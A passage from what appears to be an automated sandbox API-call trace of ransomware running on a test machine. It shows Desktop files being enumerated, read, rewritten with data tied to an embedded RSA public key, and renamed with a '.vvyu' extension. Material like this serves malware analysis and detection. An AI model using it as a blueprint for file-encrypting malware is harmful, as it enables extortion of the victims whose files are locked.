| out: hHeap=0x2c0000) returned 1 [0188.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da00 [0188.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9a0 | out: hHeap=0x2c0000) returned 1 [0188.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9a0 [0188.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9b8 | out: hHeap=0x2c0000) returned 1 [0188.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0188.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d970 | out: hHeap=0x2c0000) returned 1 [0188.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d970 [0188.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0188.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9d0 | out: hHeap=0x2c0000) returned 1 [0188.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da00 | out: hHeap=0x2c0000) returned 1 [0188.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0188.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d970 | out: hHeap=0x2c0000) returned 1 [0188.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0188.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9a0 | out: hHeap=0x2c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9e8 | out: hHeap=0x2c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d988 | out: hHeap=0x2c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d958 | out: hHeap=0x2c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d940 | out: hHeap=0x2c0000) returned 1 [0188.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2770 | out: hHeap=0x2c0000) returned 1 [0188.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.558] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xe25b, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xe25b, lpOverlapped=0x0) returned 1 [0188.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0188.559] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe260, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.559] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0188.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0188.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0188.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0188.560] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0188.561] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.561] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.561] CloseHandle (hObject=0x584) returned 1 [0188.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0188.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af1f88 [0188.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.563] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\UIMsFJjz.rtf" (normalized: "c:\\users\\keecfmwgj\\desktop\\uimsfjjz.rtf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\UIMsFJjz.rtf.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\uimsfjjz.rtf.vvyu")) returned 1 [0188.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.568] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.572] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc74bdd80, ftCreationTime.dwHighDateTime=0x1d89dbc, ftLastAccessTime.dwLowDateTime=0x10fe9850, ftLastAccessTime.dwHighDateTime=0x1d89dbd, ftLastWriteTime.dwLowDateTime=0x10fe9850, ftLastWriteTime.dwHighDateTime=0x1d89dbd, nFileSizeHigh=0x0, nFileSizeLow=0xa5dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usU4fi-1.ots", cAlternateFileName="")) returned 1 [0188.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2770 [0188.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ed40 [0188.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2770 | out: hHeap=0x2c0000) returned 1 [0188.572] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\usU4fi-1.ots") returned=".ots" [0188.572] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\usU4fi-1.ots" (normalized: "c:\\users\\keecfmwgj\\desktop\\usu4fi-1.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.572] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=42460) returned 1 [0188.572] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.575] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa5b6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.575] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.578] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.578] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xa5dc, lpOverlapped=0x0) returned 1 [0188.579] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.579] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.579] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.579] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.580] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.580] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.580] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.581] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.581] GetLastError () returned 0x0 [0188.581] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.581] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.581] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.581] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.581] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa5e0) returned 0x2af5168 [0188.581] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2770 [0188.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d940 [0188.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae27b8 [0188.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d958 [0188.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d988 [0188.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9e8 [0188.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9a0 [0188.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0188.582] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0188.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0188.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d988 | out: hHeap=0x2c0000) returned 1 [0188.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9a0 | out: hHeap=0x2c0000) returned 1 [0188.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9e8 | out: hHeap=0x2c0000) returned 1 [0188.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9e8 [0188.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0188.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9a0 [0188.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d988 [0188.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0188.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0188.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0188.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9a0 | out: hHeap=0x2c0000) returned 1 [0188.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d988 | out: hHeap=0x2c0000) returned 1 [0188.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9e8 | out: hHeap=0x2c0000) returned 1 [0188.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0188.587] GetCurrentThreadId () returned 0x5d8 [0188.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ee6e0 [0188.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.588] GetCurrentThreadId () returned 0x5d8 [0188.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9e8 [0188.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.591] RtlAllocateHeap 